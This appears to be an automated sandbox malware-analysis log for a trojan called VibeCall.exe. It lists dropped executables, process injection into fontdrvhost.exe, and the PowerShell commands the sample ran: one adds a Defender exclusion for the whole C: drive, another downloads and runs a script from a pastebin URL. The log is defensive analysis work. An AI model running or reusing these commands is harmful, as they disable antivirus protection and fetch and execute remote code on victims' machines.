                      Source: Yara matchFile source: 32.3.fontdrvhost.exe.5050000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.fontdrvhost.exe.53f0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.aisolution_vibecall_a.exe.3980000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.aisolution_vibecall_a.exe.3980000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.aisolution_vibecall_a.exe.3760000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.fontdrvhost.exe.5610000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.3.contry_solution_vibecall_e.exe.36c0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.3.contry_solution_vibecall_e.exe.34a0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.fontdrvhost.exe.4e30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.fontdrvhost.exe.4e30000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.3.contry_solution_vibecall_e.exe.36c0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.fontdrvhost.exe.4e30000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000003.2634358521.00000000036C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.2576990183.0000000005610000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2563032067.0000000003980000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.2642561668.0000000004E30000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2562816443.0000000003760000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.2643038762.0000000005050000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.2633946073.00000000034A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.2576557812.00000000053F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aisolution_vibecall_a.exe PID: 2692, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: contry_solution_vibecall_e.exe PID: 3236, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_0516C3B9 CreateEventA,NtDeviceIoControlFile,WaitForSingleObject,GetLastError,CloseHandle,WSASetLastError,CloseHandle,WSASetLastError,32_2_0516C3B9
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_000001D03B7F0AC8 NtAcceptConnectPort,NtAcceptConnectPort,37_2_000001D03B7F0AC8
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_000001D03B7F15C0 NtAcceptConnectPort,37_2_000001D03B7F15C0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_000001D03B7F1CF4 NtAcceptConnectPort,CloseHandle,37_2_000001D03B7F1CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_000001D03B7F1AA4 NtAcceptConnectPort,NtAcceptConnectPort,37_2_000001D03B7F1AA4
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_0516C3B9: CreateEventA,NtDeviceIoControlFile,WaitForSingleObject,GetLastError,CloseHandle,WSASetLastError,CloseHandle,WSASetLastError,32_2_0516C3B9
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0118F13B15_3_0118F13B
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0119117015_3_01191170
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0119CC2515_3_0119CC25
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0118C09A15_3_0118C09A
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_01196F8915_3_01196F89
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0118C3DC15_3_0118C3DC
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0119264D15_3_0119264D
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_009CC09A16_3_009CC09A
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_009DCC2516_3_009DCC25
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_009CF13B16_3_009CF13B
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_009D117016_3_009D1170
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_009D264D16_3_009D264D
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_009D6F8916_3_009D6F89
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_009CC3DC16_3_009CC3DC
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_0517D5A932_2_0517D5A9
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_0517FC0232_2_0517FC02
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_051694D032_2_051694D0
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_0517CF7E32_2_0517CF7E
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_0517866032_2_05178660
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_0517318B32_2_0517318B
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_051691CA32_2_051691CA
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_051789ED32_2_051789ED
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_0518104C32_2_0518104C
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_0517DB4532_2_0517DB45
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 32_2_0517D22932_2_0517D229
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_000001D03B7F0C7037_2_000001D03B7F0C70
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: String function: 009C7FB0 appears 38 times
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: String function: 01187FB0 appears 38 times
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 636
                      Source: VibeCall.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Source: aisolution_vibecall_a.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: aisolution_vibecall_a.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: contry_solution_vibecall_e.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: contry_solution_vibecall_e.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: contry_solution_vibecall_e.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: Resource name: BIN type: PE32+ executable (console) x86-64, for MS Windows
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: Resource name: BIN type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: Resource name: BIN type: PE32+ executable (console) Aarch64, for MS Windows
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: Resource name: BIN type: PE32+ executable (DLL) (GUI) Aarch64, for MS Windows
                      Source: videosolution_vibecall_b.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: videosolution_vibecall_b.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: VibeCall.exe, 00000000.00000000.1748961023.00007FF7C2C12000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs VibeCall.exe
                      Source: VibeCall.exe, 00000000.00000000.1748961023.00007FF7C2C12000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVibeCall.dll2 vs VibeCall.exe
                      Source: classification engineClassification label: mal99.troj.evad.winEXE@30/25@5/8
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\aisolution_vibecall_a.exeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3020
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-dd899bff-6062-c92311-31f6a4e226f8}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_03
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4e5bfc57-9dd8-f68e5-2d765d85c0d6}
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1352
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\AppData\Local\Temp\psyu0ew1.k2rJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\VibeCall.exe "C:\Users\user\Desktop\VibeCall.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\aisolution_vibecall_a.exe "C:\Users\user\aisolution_vibecall_a.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\soundsolution_vibecall_c.exe "C:\Users\user\AppData\Local\Temp\soundsolution_vibecall_c.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\videosolution_vibecall_b.exe "C:\Users\user\videosolution_vibecall_b.exe"
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 636
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 628
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 640
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 632
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1352 -s 140
                      Source: C:\Users\user\videosolution_vibecall_b.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 252
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\aisolution_vibecall_a.exe "C:\Users\user\aisolution_vibecall_a.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\soundsolution_vibecall_c.exe "C:\Users\user\AppData\Local\Temp\soundsolution_vibecall_c.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\videosolution_vibecall_b.exe "C:\Users\user\videosolution_vibecall_b.exe"Jump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: icu.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wshunix.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
